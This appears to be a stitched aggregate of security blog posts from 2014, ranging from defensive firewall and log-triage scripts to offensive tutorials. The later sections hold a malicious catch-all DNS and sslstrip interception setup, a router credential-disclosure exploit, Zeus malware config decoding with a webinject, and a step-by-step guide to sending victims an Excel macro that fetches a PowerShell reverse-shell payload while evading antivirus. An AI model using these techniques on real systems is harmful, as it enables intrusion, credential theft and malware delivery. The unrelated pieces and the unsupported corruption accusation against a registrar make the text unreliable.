Monthly Archives: January 2014

Episode #174: Lightning Lockdown

Hal firewalls fast

Recently a client needed me to quickly set up an iptables firewall on a production server that was effectively open on the Internet. I knew very little about the machine, and we couldn't afford to break any of the production traffic to and from the box.

It occurred to me that a decent first approximation would be to simply look at the network services currently in use, and create a firewall based on that. The resulting policy would probably be a bit more loose than it needed to or should be, but it would be infinitely better than no firewall at all!

I went with lsof, because I found the output easier to parse than netstat:

# lsof -i -nlP | awk '{print $1, $8, $9}' | sort -u
httpd TCP *:80
named TCP
named TCP
named TCP [::1]:953
named TCP
named UDP
named UDP
ntpd UDP [::1]:123
ntpd UDP *:123
ntpd UDP
ntpd UDP
ntpd UDP [fe80::baac:6fff:fe8e:a0f1]:123
ntpd UDP [fe80::baac:6fff:fe8e:a0f2]:123
portreser UDP *:783
sendmail TCP
sendmail TCP>
sendmail TCP *:587
sshd TCP *:22
sshd TCP>

I could have left off the process name, but it helped me decide which ports were important to include in the new firewall rules. Honestly, the output above was good enough for me to quickly throw together some workable iptables rules. I simply saved the output to a text file and hacked things together with a text editor.

But maybe you only care about the port information:

# lsof -i -nlP | awk '{print $9, $8, $1}' | sed 's/.*://' | sort -u
123 UDP ntpd
1526 TCP sendmail
22 TCP sshd
25 TCP sendmail
39054 TCP sshd
53 TCP named
53 UDP named
587 TCP sendmail
783 UDP portreser
80 TCP httpd
953 TCP named

Note that I inverted the field output order, just to make my sed a little easier to write.

If you wanted to go really crazy, you could even create and load the actual rules on the fly. I don't recommend this at all, but it will make Tim's life harder in the next section, so here goes:

lsof -i -nlP | tail -n +2 | awk '{print $9, $8}' | 
sed 's/.*://' | sort -u | tr A-Z a-z |
while read port proto; do ufw allow $port/$proto; done

I added a "tail -n +2" to get rid of the header line. I also dropped the command name from my awk output. There's a new "tr A-Z a-z" in there to lower-case the protocol name. Finally we end with a loop that takes the port and protocol and uses the ufw command line interface to add the rules. One caveat: nothing here tells a listening socket from an established connection, so the remote ends of active sessions (the 39054 and 1526 in the output above) get rules of their own. Review the list before loading it, or restrict lsof to listeners with "lsof -nP -iTCP -sTCP:LISTEN" (plus a separate "-iUDP" pass, since UDP has no listen state). You could do the same with the iptables command and its nasty syntax, but if you're on a Linux distro with UFW, I strongly urge you to use it!
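The same idea with those two gaps closed, as an added example that is not part of the original episode: it keeps only listening sockets, drops anything bound to loopback, and prints the ufw commands instead of running them so the policy can be reviewed first. The lsof sample is constructed to match the column layout of lsof -i -nlP on Linux; the addresses are documentation ranges, not a real host.

```shell
#!/bin/sh
# Added example, not from the original post: build the allow-list from
# listening sockets only. The remote port of an established session
# (39054 and 1526 in Hal's output) must not become a firewall rule, and
# services bound to loopback need no rule at all.

# Constructed sample in the column layout of `lsof -i -nlP` on Linux;
# addresses are documentation ranges, not a real machine.
SAMPLE_LSOF='COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
httpd    1201    0    4u  IPv4  12345      0t0  TCP *:80 (LISTEN)
named    1002  105   20u  IPv4  12346      0t0  TCP 127.0.0.1:953 (LISTEN)
named    1002  105   21u  IPv6  12347      0t0  TCP [::1]:953 (LISTEN)
named    1002  105   22u  IPv4  12348      0t0  UDP 192.0.2.10:53
ntpd     1100  106   16u  IPv6  12349      0t0  UDP [::1]:123
ntpd     1100  106   17u  IPv4  12350      0t0  UDP *:123
sendmail 1300    0    4u  IPv4  12351      0t0  TCP *:25 (LISTEN)
sendmail 1300    0    5u  IPv4  12352      0t0  TCP *:587 (LISTEN)
sendmail 1301    0    6u  IPv4  12353      0t0  TCP 192.0.2.10:25->198.51.100.7:1526 (ESTABLISHED)
sshd     1400    0    3u  IPv4  12354      0t0  TCP *:22 (LISTEN)
sshd     1401    0    3u  IPv4  12355      0t0  TCP 192.0.2.10:22->198.51.100.9:39054 (ESTABLISHED)'

# stdin: lsof output as above. stdout: one "port/proto" per listening
# socket reachable from outside the host, sorted and de-duplicated.
# $8 is the NODE column (TCP/UDP), $9 the NAME column (addr:port[->peer]).
listening_ports() {
    awk 'NR > 1 && $9 !~ /->/ && $9 !~ /^(127\.|\[::1\])/ {
            port = $9; sub(/.*:/, "", port)
            print port "/" tolower($8)
        }' | LC_ALL=C sort -u
}

# Turn the list into ufw commands but print them instead of running them,
# so the policy can be read (and trimmed) before anything is loaded.
ufw_rules() {
    while read -r rule; do
        printf 'ufw allow %s\n' "$rule"
    done
}

printf '%s\n' "$SAMPLE_LSOF" | listening_ports | ufw_rules
```

Pipe the printed commands into sh once you are happy with them; the loopback filter is why 953 (rndc on named) never shows up, and the "->" filter is what keeps the two client-side ports out.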

So, Tim, I figure you can parse netstat output pretty easily. How about the command-line interface to the Windows firewall? Remember, adversity builds character...

Tim builds character

When I first saw this I thought, "Man, this is going to be easy with the new cmdlets in PowerShell v4!" There are a lot of new cmdlets available in PowerShell version 4, and both Windows 8.1 and Server 2012R2 ship with PowerShell version 4. In addition, PowerShell version 4 is available for Windows 7 SP1 (and later) and Windows Server 2008 R2 SP1 (and later).

The first cmdlet that will help us out here is Get-NetTCPConnection. According to the help page this cmdlet "gets current TCP connections. Use this cmdlet to view TCP connection properties such as local or remote IP address, local or remote port, and connection state." This is going to be great! But...

It doesn't mention the process ID or process name. Nooooo! This can't be. Let's look at all the properties of the output objects.

PS C:\> Get-NetTCPConnection | Format-List *

State : Established
AppliedSetting : Internet
Caption :
Description :
ElementName :
InstanceID :
CommunicationStatus :
DetailedStatus :
HealthState :
InstallDate :
Name :
OperatingStatus :
OperationalStatus :
PrimaryStatus :
Status :
StatusDescriptions :
AvailableRequestedStates :
EnabledDefault : 2
EnabledState :
OtherEnabledState :
RequestedState : 5
TimeOfLastStateChange :
TransitioningToState : 12
AggregationBehavior :
Directionality :
LocalAddress :
LocalPort : 445
RemoteAddress :
RemotePort : 49278
PSComputerName :
CimClass : ROOT/StandardCimv2:MSFT_NetTCPConnection
CimInstanceProperties : {Caption, Description, ElementName, InstanceID...}
CimSystemProperties : Microsoft.Management.Infrastructure.CimSystemProperties

Dang! This will get most of what we want (where "want" was defined by that Hal guy), but it won't get the process ID or the process name. So much for rubbing the new cmdlets in his face.

Let's forget about Hal for a second and get what we can with this cmdlet.

PS C:\> Get-NetTCPConnection | Select-Object LocalPort | Sort-Object -Unique LocalPort

This is helpful for getting a list of ports, but not useful for making decisions about what should be allowed. Also, we would need to run Get-NetUDPEndpoint separately to get the UDP endpoints. This is so close, yet so bloody far. (Later Windows releases add an OwningProcess property to these objects, but on the versions discussed here it isn't there.) We have to resort to the old-school netstat command and its -b option to get the executable name. In episode 123 we needed parsed netstat output, and I recommended the Get-Netstat script for that. Sadly, we are going to have to resort to it again. With this script we can quickly get the port, protocol, and process name.

PS C:\> .\get-netstat.ps1 | Select-Object ProcessName, Protocol, LocalPort | 
Sort-Object -Unique LocalPort, Protocol, ProcessName

ProcessName Protocol Localport
----------- -------- ---------
svchost TCP 135
System UDP 137
System UDP 138
System TCP 139
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
System TCP 445
svchost UDP 4500

It should be pretty obvious that ports 135-139 (RPC endpoint mapper and NetBIOS) and 445 (SMB) should not be accessible from the Internet. We can filter these ports out so that we don't allow them through the firewall.

PS C:\> ... | Where-Object { (135..139 + 445) -NotContains $_.LocalPort }
ProcessName Protocol Localport
----------- -------- ---------
svchost UDP 1900
svchost UDP 3540
svchost UDP 3544
svchost TCP 3587
dasHost UDP 3702
svchost UDP 3702
svchost UDP 4500

Now that we have the ports and protocols we can create new firewall rules using the new New-NetFirewallRule cmdlet. Yeah! Note the -Direction Inbound: the goal is to admit traffic to these listening ports, just like Hal's ufw rules (and the netsh version below with dir=in); the Windows firewall allows outbound traffic by default, so an outbound allow rule would not change anything.

PS C:\> .\get-netstat.ps1 | Select-Object Protocol, LocalPort | Sort-Object -Unique * |
Where-Object { (135..139 + 445) -NotContains $_.LocalPort } |
ForEach-Object { New-NetFirewallRule -DisplayName AllowedByScript -Direction Inbound
-Action Allow -LocalPort $_.LocalPort -Protocol $_.Protocol }

Name : {d15ca484-5d16-413f-8460-a29204ff06ed}
DisplayName : AllowedByScript
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Allow
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local

These new firewall cmdlets really make things easier, but if you don't have PowerShell v4 you can still use the old netsh command to add the firewall rules. Also, Get-Netstat supports older versions of PowerShell as well, so this is nicely backwards compatible. All we need to do is replace the command inside the ForEach-Object cmdlet's script block.

PS C:\> ... | ForEach-Object { netsh advfirewall firewall add rule
name="AllowedByScript" dir=in action=allow "protocol=$($_.Protocol)"
"localport=$($_.LocalPort)" }

The $( ) subexpressions matter here: PowerShell expands a bare $_ inside an argument but treats the trailing .Protocol as literal text, so wrapping the property access in $( ) is what gets netsh the actual protocol and port values.

Invasion of JCE Bots

Joomla has been one of the most popular CMSs for a long time. It powers a huge number of sites. That's great! The flip side is that, because Joomla has been very popular for a long time, there are still very many sites running older versions of Joomla as well as older versions of Joomla components. For example, the 1.5.x branch of Joomla (2008-2010) still has a noticeable share of live Joomla sites.

Old versions may work well for your site, but they have multiple well-known security holes, so they are low-hanging fruit for hackers. Let me show this using a real-world example.

JCE attack

JCE is a component, a fancy content editor, that can be found on almost every Joomla site. It has a well-known security hole that allows anyone to upload arbitrary files to the server.

You can easily find working exploit code for this vulnerability. What it does is:

  1. Checks whether a vulnerable version of JCE is installed (2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, ...)
  2. Exploits the bug in the JCE image manager to upload a PHP file with a .gif extension to the images/stories directory
  3. Then uses a JSON command to rename the .gif file to *.php

Now you have a backdoor on the server and can do whatever you want with the site.

This is how this attack looks in logs (real example; client IP omitted):

 - - [23/Jan/2014:16:46:54 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)"
 - - [23/Jan/2014:16:46:55 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 329 "-" "BOT/0.1 (BOT for JCE)"
 - - [23/Jan/2014:16:46:55 -0500] "GET /images/stories/3xp.php HTTP/1.0" 200 465 "-" "BOT/0.1 (BOT for JCE)"

As I mentioned, JCE is a very popular component and there are still many sites that use old versions of it. No wonder hackers are scanning the Internet for such vulnerable sites. They reworked the exploit code for use in their automated tools, which relentlessly test millions of sites one after another. These days I can find multiple requests with the "BOT/0.1 (BOT for JCE)" User-Agent string in the logs of almost every site that I check, even in the logs of sites that have never had Joomla installed.

I’d like to share some interesting statistics of a real site that had been hacked using this JCE hole and then was being routinely reinfected every day.

  • 7,409 requests with the User-Agent “BOT/0.1 (BOT for JCE)” that came from 785 different IPs during the period of Dec 24th – Jan 24th (one month)
  • 239 requests from 51 unique IP addresses during the last 24 hours
  • 4 independent (uploaded different types of backdoors) successful infections during one day.
  • plus, multiple tests for other vulnerabilities.
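The statistics above (requests from the scanner, distinct source IPs, and whether any upload actually succeeded) can be pulled from an access log with a few lines of awk. This is an added example, not code from the Sucuri post; the log lines are constructed in Apache combined format with documentation-range addresses, and the path check assumes the stock images/stories location the exploit writes to.

```shell
#!/bin/sh
# Added example, not from the original post: triage a web server log for
# the JCE scanner described above. Sample lines are constructed in Apache
# combined format with documentation-range addresses, not a real site's log.
SAMPLE_LOG='198.51.100.7 - - [23/Jan/2014:16:46:54 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 200 302 "-" "BOT/0.1 (BOT for JCE)"
198.51.100.7 - - [23/Jan/2014:16:46:55 -0500] "GET /images/stories/3xp.php HTTP/1.0" 200 465 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.5 - - [23/Jan/2014:17:02:10 -0500] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.0" 404 210 "-" "BOT/0.1 (BOT for JCE)"
203.0.113.9 - - [23/Jan/2014:17:05:41 -0500] "GET /images/stories/x.php HTTP/1.0" 403 199 "-" "Mozilla/5.0"
192.0.2.44 - - [23/Jan/2014:17:06:02 -0500] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1)"'

# Splitting on double quotes gives: $1 = client/ident/auth/time,
# $2 = request line, $3 = status and bytes, $6 = User-Agent.
BOT_UA='BOT/0.1 (BOT for JCE)'

# How loud is the scanner? Request count and number of distinct sources.
jce_bot_summary() {
    awk -F'"' -v ua="$BOT_UA" '
        $6 == ua { n++; split($1, a, " "); ips[a[1]] = 1 }
        END {
            c = 0; for (ip in ips) c++
            printf "requests=%d unique_ips=%d\n", n, c
        }'
}

# Did anyone get in? A PHP file served with 200 out of images/stories means
# the upload-and-rename step worked, whatever User-Agent was used. Probes
# answered with 403 (the .htaccess fix) or 404 are left out on purpose.
jce_webshell_hits() {
    awk -F'"' '{
        split($1, a, " "); split($2, r, " "); split($3, s, " ")
        if (r[2] ~ "^/images/stories/[^/?]+\\.php" && s[1] == "200")
            print a[1], r[2]
    }'
}

printf '%s\n' "$SAMPLE_LOG" | jce_bot_summary
printf '%s\n' "$SAMPLE_LOG" | jce_webshell_hits
```

Run it as `jce_webshell_hits < access.log` on a real log; anything it prints is a file to pull and a source address to block, and the hit count per day is the "independent successful infections" figure above. The User-Agent count is only a lower bound, since the bots can change that string at will.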

To webmasters

As you can see, this is not something you can neglect or consider an insignificant threat. It's silly to hope that hackers won't find your site. Today hackers have the resources to spider the Internet almost as efficiently as Google did just about 10 years ago, so there is almost no chance your site will stay unnoticed. The only way to prevent the hacks is to be proactive: keep all software up-to-date and harden your sites.

In the case of this particular JCE attack:

  1. Make sure to upgrade your Joomla site to the most current version.
  2. Upgrade JCE to the latest version. You can find download packages for all three branches of Joomla here.
  3. Protect all file upload directories and all directories that shouldn't contain .php files. For example, place the following .htaccess file there to prevent execution of PHP files (widen the pattern if your server also executes .phtml or .php5):
    <Files *.php>
    deny from all
    </Files>
  4. Try blocking requests with the "BOT/0.1 (BOT for JCE)" User-Agent string. Of course, this shouldn't be considered real protection: hackers can change the User-Agent string to whatever they want. But it can help keep some dumb, annoying bots away from your site.
  5. If, for some reason, you can't upgrade your site at this moment, consider placing it behind a website firewall that will block malicious traffic before it reaches your server. This is something we call virtual patching in Sucuri CloudProxy.

Inside A Malware Campaign

A while back I received some spam email with the theme of adding new friends on Facebook. This is how I became aware of the campaign now known as the "Aqua VPN" campaign.

World-renowned and internationally respected anti-virus vendor Malwarebytes also blogged about this campaign here (thanks to @paperghost).

After gaining admin rights to the web panel, I built an SJDB (silent Java drive-by); here is what I found.

Build options

More build options

Let's take a look at all those available domains (no need for aquavpn, that's already well known):
osrsbot(.)net >
twitch(.)pw > (trying to lure gamers into thinking this is the real Twitch URL) << takedown confirmed by @vriesHd; this domain now leads to a 502.
ucam(.)me >
videoreaper(.)com >
live-stream(.)us >
teentalk(.)us >
rapid-miner(.)net >

What a surprise! All registered by Namecheap.

Now for a scan of the .jar (VirusTotal was down, but I have scanned this file there before; in the meantime this will do):

Add-on domains!
If you want, you can spend a little extra money and, I'll be honest, one of these domains is very good for social engineering.

riotpointgenerator(.)com >
leageuoflegends(.)com >

Both these registrars have had abuse reports sent and I'm awaiting a response.

Namecheap exposed: official press release

Official press notice regarding namecheap corruption:

Legal disclaimer: any articles linked or people mentioned are in no way affiliated and or associated with this press release. The companies and or person(s) are in no way responsible for the content in this press release 

Recently, I noticed a spam campaign exploiting the "new friend on Facebook" email template to lure users into clicking malicious links. This has been confirmed by Malwarebytes here (@paperghost). The domain is registered by Namecheap. Proof of registration here.

I've contacted Namecheap via Twitter, phone and email (proof of contact here and here). Their response, in summary: they refuse to suspend the domain as the domain doesn't use their hosting (they can easily suspend the domain the same way they would with an ICANN or IC3 request).

This company is completely corrupt and is perfectly happy to be the registrar behind a huge malware campaign. I've contacted them at least 30 times by now and they've made absolutely no effort to even consider escalating this to management, never mind suspend the domain.

We can't shut down the hosting. Why? Because the hosting is considered "bulletproof" and completely ignores reports (even IC3). It seems Namecheap is heading towards this "bulletproof" registrar theme.

After hacking the administration panel of this exploit kit I've noticed figures anywhere from 4-10k successful infections DAILY. This is a huge infection vector considering the publicity this campaign has received.

This press release will be forwarded to several news agencies and independent journalists.

Any questions?
Twitter: @trojan7sec

MIT(R)M Attacks – Your middle or mine?


Recently (actually months ago now) my wife went out to see some friends from church, which left me with a couple of hours to kill at home (after I put the kids to bed, of course). I decided to use this opportunity to look for security vulnerabilities in the wireless router provided by my ISP.

I installed the latest firmware update on the device and soon discovered a serious vulnerability in the router's password recovery feature (when exploited, this vulnerability displays the admin credentials of the router in cleartext).

Note: At this point some of you might be thinking....siiiiiigghhhhhhh...."so a consumer grade wireless router has a security vulnerability...what's new...most home users don't bother changing the default username and password anyway"...right...but stay with me it gets better.

I didn't have much time to contact the vendor directly, so I decided to write up a description and send it off to Secunia. After several days I received back the following response:

We have received your report regarding <censored> wireless
router. But, unfortunately, we are not able to consider it as a SVCRP [1]
report as we do not have said device on our premise and subsequently cannot
confirm the vulnerability within our secure test environment.

Therefore, we will not process this report. In case you would like these
issues to be addressed by the vendor, we would like to encourage you to
report them to the vendor directly.

Thank you for reporting this to us though. We look forward to receive more
reports from you.

What!? You know they sell these at Walmart, right? Well, you can't really blame Secunia; what can you really do with admin access to a home wireless router anyway? Well... let's take a look....

Before we delve into this further I should note that I attempted desperately to report the vulnerability to the vendor directly. This process was soooooo insanely difficult that it actually drove me to about 18 seconds of maniacal laughter. I seriously don't know if the internal communication was just horrible (I actually started getting emails back from the vendor addressing me as "Ms. Difrank"), or if they just DO NOT CARE!

There are actually many different attack vectors that can be leveraged once you compromise a home wireless router (or any router), but in the interest of brevity I just want to discuss one that hasn't been given enough attention (IMO).

Typically, Man-in-the-Middle (MITM) attacks are launched from "close" range against local networks. One has to ask the question though... where exactly is the "middle"? Without getting too philosophical, I'm going to suggest that the "middle" can be any point between the source and the destination.

With that being said, let's see how we can launch a Man-in-the-Relative-Middle attack against users connected to a home wireless router from anywhere in the "middle" (even over the Internet).

Note: This example focuses on intercepting HTTP/S traffic only.

Configure A Malicious DNS Server

First, I configure my laptop as a DNS server that will respond to all DNS requests with my laptop's IP address. There are many different ways/tools to do this, but for this demo I decided to use a simple BIND configuration that will respond to all DNS requests with my laptop IP.

Note: I don't recommend this technique in an actual Pentest, it's better to target specific domains (facebook, linkedin, google, etc.) 

1.) Add a new entry into your named.conf.local file for the "root" domain

2.) Setup a new zone file for the root domain (in this case "db.any") and copy it to the directory specified within your named.conf.options

After restarting the BIND service, any DNS request submitted to the server will return the IP address of the attacking system (in this case the laptop's LAN address).

Note: I'm using an IP address on the local LAN, when launching this attack over the Internet you would configure this with your public IP.
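The two BIND pieces from steps 1 and 2, written out as an added example rather than the author's own screenshots: a named.conf.local entry that makes the server master for the root zone, and a db.any zone file whose wildcard A record answers every name with the attacking host's address. The file locations and the ns.catchall.test./hostmaster names are placeholders, not values from the post.

```shell
#!/bin/sh
# Added example, not the post's own files: generate the two BIND pieces the
# steps above describe, parameterised on the attacking host's address.
# File locations and the ns./hostmaster names are placeholders.

write_catchall_zone() {
    # $1 = address every name should resolve to; $2 = output directory
    ip=$1; dir=$2
    mkdir -p "$dir"

    # Entry for named.conf.local: being master for "." means every query
    # is answered locally from db.any and never forwarded or recursed.
    cat > "$dir/named.conf.local" <<EOF
zone "." {
    type master;
    file "$dir/db.any";
};
EOF

    # Zone file: the wildcard at the apex matches any name that is not
    # defined explicitly, so www.example.com and everything else get $ip.
    # The short TTL keeps answers from lingering in client caches.
    cat > "$dir/db.any" <<EOF
\$TTL 60
@   IN  SOA ns.catchall.test. hostmaster.catchall.test. (
        1       ; serial
        3600    ; refresh
        900     ; retry
        604800  ; expire
        60 )    ; negative-cache TTL
@   IN  NS  ns.catchall.test.
ns  IN  A   $ip
@   IN  A   $ip
*   IN  A   $ip
EOF
}

out="${TMPDIR:-/tmp}/catchall-demo"
write_catchall_zone 192.0.2.10 "$out"
cat "$out/named.conf.local" "$out/db.any"
```

Validate the zone with `named-checkzone . db.any` before reloading named. For the targeted variant the author recommends for real engagements, declare a `zone "example.com"` block per domain of interest instead of the root zone and leave normal recursion in place for everything else.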

Configure sslstrip

Most sensitive information that traverses the web nowadays is encrypted using SSL/TLS. Rather than configuring an inline proxy server to intercept HTTP/S requests (which will work, but generates certificate errors on the client), I've decided to use one of my favorite tools: sslstrip.

Note: If you aren't familiar with sslstrip I encourage you to take a look here

Typically we would use sslstrip in addition to IP forwarding, ARP spoofing, and port redirection techniques on the local LAN (which is what it was designed for), but it also works pretty well just by kicking it off and sending web traffic directly to it.

Start sslstrip: 
sslstrip -l 80 -p -w sslposts.txt

This will configure sslstrip to listen on tcp port 80 and log all HTTP POSTs to the file sslposts.txt

Monitor HTTP POSTs:
tail -f sslposts.txt

Now that our server is configured, we simply modify the DNS settings on the WAN interface of our target router to point to our malicious server IP.

All HTTPS pages requested will be transparently replaced with HTTP pages (there is much more going on under the hood, but I want to keep this short and sweet). This only works for sites the browser is willing to load over plain HTTP: a site that sets HSTS, or that is on the browser's HSTS preload list, will not be downgraded this way.

The login credentials can be seen in the HTTP POST log:

Ok...but how do we change the DNS settings in the router?

Most Home Internet routers are notorious for having security vulnerabilities. Let's take a look at the vulnerability I discovered and reported back in April 2013 (still vulnerable today).

The vulnerability I discovered affects NETGEAR N150 wireless routers identified as WNR1000v3. A flaw in the password recovery feature of this device allows an attacker to retrieve the router administrator username and password in cleartext.

Note:The router is vulnerable EVEN IF PASSWORD RECOVERY IS DISABLED!

I wrote a quick proof-of-concept script that extracts the username and password from a vulnerable router. I named the script "wnroast" since WNR sounds like "wiener" to me :)

wnroast <target ip> <target port>

Roasting the WNR:

Doing a Shodanhq search for WNR1000v3 reveals almost 14,000 hits! Imagine a scenario where an exploit for this vulnerability is scripted and hundreds of devices begin using malicious DNS servers, the impact would be severe.

Again MITRM represents only one of MANY attack vectors that may be taken once an attacker gains control of a home Internet router.

I should also mention that tools like sslstrip aren't really designed to work over the web so you will notice some pages don't load right or at all without additional customization.

There is certainly much more that could be said on this topic, but I'm out of time and I need to wrap this up.

In Closing:

The following are some recommendations to consider when securing administration access to your home Internet router.

  1. Disable remote administration access (over the web) or at least restrict it to trusted IPs only
  2. Whenever Possible - disable access to the administration page from the Wireless LAN (wired only)

That's all the time I've got at this point; let's hope this gets patched soon!

Special thanks to wildB1ll for helping me test this out!

WNRoast can be downloaded here.

Update (7-5-14): Metasploit auxiliary module available here.

Full Disclosure Details:

The following is my original submission to Secunia and NETGEAR disclosing the details of the vulnerability:

Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless router are affected by a password recovery vulnerability. Exploiting this vulnerability allows an attacker to recover the router's (plaintext) Administrator credentials and subsequently gain full access to the device. This vulnerability can be exploited remotely if the remote administration access feature is enabled (as well as locally via wired or wireless access).
Tested Device Model: NETGEAR N150 WNR1000v3
Tested Device Firmware Versions: V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
Potential Impacts: Gaining full control over a wireless router exposes multiple attack vectors including: DoS, DNS control (many ways this can be leveraged to exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSKs (for guest and private networks), firewall rule and port forwarding manipulation, etc.
The password recovery mechanism appears to be designed to work as follows:
1.) After failing to login the user will be redirected to a password recovery page that requests the router serial number
2.) If the user enters the serial number correctly, another page will appear that requires the user to correctly answer 2 secret questions
3.) If the user answers the secret questions correctly, the router username and password is displayed
The problem: The implementation of this password recovery method has issues...lots of issues
Vulnerability and Exploit Details:
1.) Access the router login through a web browser:
2.) Select "Cancel" on the HTTP Basic login box (or enter arbitrary credentials); the router responds with the following (note the "unauth.cgi?id" parameter):

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"
Content-type: text/html

<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<title>401 Unauthorized</title></head>
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
<p>Access to this resource is denied, your client has not supplied the correct authentication.</p><form method="post" action="unauth.cgi?id=78185530" name="aForm"></form></body>

3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP post request:
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache

The username and (plaintext) password are returned in the response (truncated for brevity):
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>

Decoding Zeus dynamic config

I got a look at the Zeus builder that was released by the MMBB guy, and finally decided to write something about it, so let's talk about the change in the config encryption.
MD5: 0a05783316e7f765e731aadf5098564f

This version uses AES instead of RC4 and can interact with the latest version of Firefox.
Anyway, it's nothing more than a basic Zeus v2.

iBank parser on the panel, monitoring of process:
About the panel: the released version requires the ionCube loader (nvm, the gate code can be recovered easily).

Now let's view an example of a report from the modules, keylog + screenshot:

Part of the static config (in plaintext in the generated bot):

Installation process/dynamic config decoding (beware, dubstep):

And a small piece of code, because it's easier to understand:
    <?php
    // Zeus dynamic config decoder: AES-128-ECB with a key derived from the
    // builder's hard-coded string, followed by Zeus's "visual" XOR unmasking.
    function decode($data, $key) {
        $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128, '', MCRYPT_MODE_ECB, '');
        // ECB has no IV, but mcrypt_generic_init() still wants one of the right size.
        $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
        mcrypt_generic_init($td, $key, $iv);
        $data = mdecrypt_generic($td, $data);
        mcrypt_generic_deinit($td);
        mcrypt_module_close($td);
        return $data;
    }
    // Undo the XOR chain: each byte was XORed with its predecessor, so walk
    // backwards from the end to keep the original neighbour available.
    function visualDecrypt(&$data) {
        $len = strlen($data);
        if ($len > 0)
            for ($i = $len - 1; $i > 0; $i--)
                $data[$i] = chr(ord($data[$i]) ^ ord($data[$i - 1]));
    }
    $data    = file_get_contents('config.bin');
    $key     = md5('hasd7h12g1', true);   // raw 16-byte digest, not the hex string
    $decoded = decode($data, $key);
    visualDecrypt($decoded);
    $size = strlen($decoded);
    header('Content-Type: application/octet-stream;');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . $size);
    header('Content-Disposition: attachment; filename=config_decrypted.dll');
    header('Expires: 0');
    header('Cache-Control: no-cache, must-revalidate');
    header('Pragma: no-cache');
    echo $decoded;

You can find the decoded modules here:
JAVA: 7d7ae6ffbd9f3c7673b339f9b94493e5
BSS: cc98dabebe047c6115a6cd9d13ed3122
KEYLOG: 8ac1c7c019d16ff3b8a9543d46ae5e0e

And if you want to test yourself the WebInject, i usually use this code:
set_url* GP

<center><img src="" alt="Injected!"></center>

Recently a piece of malware targeting World of Warcraft was identified.
This threat is known as Disker, Mal/DllHook-A or Trojan.Siggen5.64266 and can steal player accounts even if they use an Authenticator.
Yes, this is another post about password-stealer malware...

There is no option to retain the password in the WoW client.

This malware is spread via fake websites leading to malicious downloads.
The Trojan is bundled with legitimate programs such as WowMatrix or Curse Client, which players use to manage their AddOns.

Malicious Wowmatrix installer. (DCDD6986941B2B4E78A558CAB3ACF337)

Fake sites:
• dns: 1 ›› ip: - address: WWW.CURSE.PW
• dns: 1 ›› ip: - address: WWW.WOWMATRIX.PW
• dns: 1 ›› ip: - address: WWW.WOWMATRIX.PW.PW

Blizzard released a statement due to this new threat:

I don't yet know how the DLL works (at least not in detail).
My debugger has some stability issues when handling wow.exe, but I will get back to this; the mechanism seems interesting (and they even use OutputDebugString!).

Network traffic after logging in:

C&C (in Chinese):

Compromised accounts:

That's all for the moment :)

Deliver a PowerShell payload using a macro

Previously we saw a method of direct shellcode execution in MS Word or Excel using a macro, but if the document is closed we lose our shell, so we have to migrate to another process, and sometimes that migration is picked up by AV. In this tutorial we are going to use a PowerShell payload instead.

Advantages of this method:

• Migration is not needed
• AV bypass

(1) First we generate the PowerShell payload; for this purpose I used SET. You can also use Veil or PowerSploit. Open SET in a terminal, select Social-Engineering Attacks and then Powershell Attack Vectors, and generate the Powershell Alphanumeric Shellcode Injector. Fill in the LHOST and LPORT values.


The generated PowerShell payload is located in /root/.set/reports/powershell/. Rename x86_powershell_injection.txt to x32.ps1.

(2) Now clone the git repository of the code:

root@bt:~# git clone
root@bt:~# cd Powershell-payload-Excel-Delivery/

(3) In the Powershell-payload-Excel-Delivery folder, rename RemovePayload.bat to remove.bat. Now host remove.bat and x32.ps1 on a web server. Then open the persist.vbs file and change the URL of x32.ps1 on lines 13 and 33 to the URL of your hosted x32.ps1. Host persist.vbs on the web server as well. I used localhost.


(4) Open the Macrocode file from the cloned folder and change the URLs on lines 27, 82 and 118 to the URLs of your hosted x32.ps1, persist.vbs and remove.bat respectively. Now add this macro code to an Excel document as described in the previous tutorial.

(5) The last step is to set up the listener.


Now send this document to the victim; as soon as they open the document and run the macro we get a shell. Once the payload has run it lives in the powershell process, so if the user closes Excel you keep your shell. You also remain in a stable process until reboot, so migration is not needed.


